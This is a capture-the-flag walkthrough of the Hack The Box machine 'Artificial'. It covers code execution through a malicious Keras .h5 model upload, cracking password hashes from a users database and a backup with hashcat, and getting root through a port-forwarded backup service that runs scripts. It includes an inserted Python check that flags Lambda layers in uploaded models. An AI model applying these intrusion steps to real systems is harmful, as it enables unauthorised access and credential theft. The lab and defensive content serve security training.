HTB - Artificial (Linux/Easy)
Seasonal Machine - Week 6 [Season 8]
Ports & Services Scanning
Command: sudo nmap 10.10.11.74 -sC -sV -v

Port 22 (SSH) is not accessible without credentials, so I proceeded with web enumeration.
Web Enumeration
Add artificial.htb to /etc/hosts to access the application.

The application has login and register pages, so I created an account and logged in.
I found a file upload feature, but it only accepts model files with the .h5 extension. I tried crafting custom .h5 files containing malicious code, but there was no way to execute them.

After some research, I found out that malicious ML model files exist.
Now I needed to create a model file, but there are some requirements given for it, so I proceeded with the Dockerfile.
I created an ML model file with a reverse shell embedded inside.
The payload spawns the reverse shell as an independent process: the model's execution ends as soon as the prediction is over, so to keep the shell alive it must run detached from the prediction.
I uploaded the model and triggered the prediction function.
The function loads the model to run the prediction; as soon as the model is loaded into the system, the malicious code inside it executes and gives RCE.
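A defender-side check for the upload handler, added here as an example and not part of the writeup: a Keras HDF5 model stores its architecture as a JSON string in the root attribute model_config, and a Lambda layer in that architecture carries serialized Python that runs when the model is deserialized, so the config can be inspected and rejected before the model is ever loaded. The sample configs are constructed; h5py is assumed installed only for the .h5 reader.

```python
import json
from typing import Any, List

# Policy list of layer classes whose config carries executable Python.
# Keras serializes a Lambda layer's function body, which is executed when
# the model is deserialized; extend this set to match local policy.
CODE_BEARING_LAYERS = {"Lambda"}

def find_code_layers(model_config: str) -> List[str]:
    """Return names of layers in a Keras model_config JSON string whose
    class is in CODE_BEARING_LAYERS. Nested models are walked recursively."""
    found: List[str] = []

    def walk(node: Any) -> None:
        if isinstance(node, dict):
            if node.get("class_name") in CODE_BEARING_LAYERS:
                found.append(node.get("config", {}).get("name", "<unnamed>"))
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(json.loads(model_config))
    return found

def is_safe_model_config(model_config: str) -> bool:
    """True when the architecture contains no code-bearing layers."""
    return not find_code_layers(model_config)

def check_h5_upload(path: str) -> bool:
    """Read model_config from a Keras .h5 file without deserializing the model.
    Assumes h5py is installed; a file with no model_config is rejected."""
    import h5py  # lazy import so the JSON-only functions run without it
    with h5py.File(path, "r") as f:
        raw = f.attrs.get("model_config")
    if raw is None:
        return False
    if isinstance(raw, bytes):
        raw = raw.decode("utf-8")
    return is_safe_model_config(raw)

# Constructed samples: a real Lambda config carries marshalled bytecode here.
DENSE = {"class_name": "Dense", "config": {"name": "dense", "units": 4}}
LAMBDA = {"class_name": "Lambda",
          "config": {"name": "lambda", "function": "<serialized function>"}}
BENIGN_CONFIG = json.dumps({"class_name": "Sequential", "config": {"name": "seq", "layers": [DENSE]}})
SUSPICIOUS_CONFIG = json.dumps({"class_name": "Sequential", "config": {"name": "seq", "layers": [DENSE, LAMBDA]}})
```

Calling check_h5_upload on each uploaded file and refusing anything that returns False blocks this class of model before the prediction endpoint ever touches it.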


The current user (app) does not have the user flag. The only other account on the box is gael, so the user flag should be there, and I needed a way to log in as gael.
Lateral Movement
Enumerating as the current user with linpeas, I found a database file, /home/app/app/instance/users.db, which looked promising.
I downloaded the file to my machine and found a user table containing password hashes, including one for gael, who is also a system user. Since the password might be reused, I cracked the hash and tried logging in with it.

User Flag Retrieved
The password worked: I got access as gael and retrieved the user flag.
The user is also in the sysadm group, which might help escalate privileges to root.

Privilege Escalation
Once again I transferred linpeas from my attacker machine to the target to enumerate it further.

Going through the results, I found a backup file, /var/backups/backrest_backup.tar.gz, that looked promising and is readable by members of the sysadm group.
I downloaded the file to my machine and analyzed it. Inside the backup is a config file containing credentials for a user.

The hash is base64 encoded, so I first decoded it and then cracked it with hashcat (-m 3200 is hashcat's bcrypt mode).
Command: hashcat --potfile-disable -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
I then tried to log in as root with the password, but it did not work, so the credential must be for something else.
Checking active network connections, I found port 9898 listening for incoming connections, but it is not exposed externally.
Local Port Forwarding

After forwarding port 9898 to my machine, I reached the application; the credentials from the backup worked and I logged in.

Exploring the application, I found a way to execute scripts, and they run as root.

So I crafted another reverse shell script, which gave me a shell as root.
Root Flag Retrieved
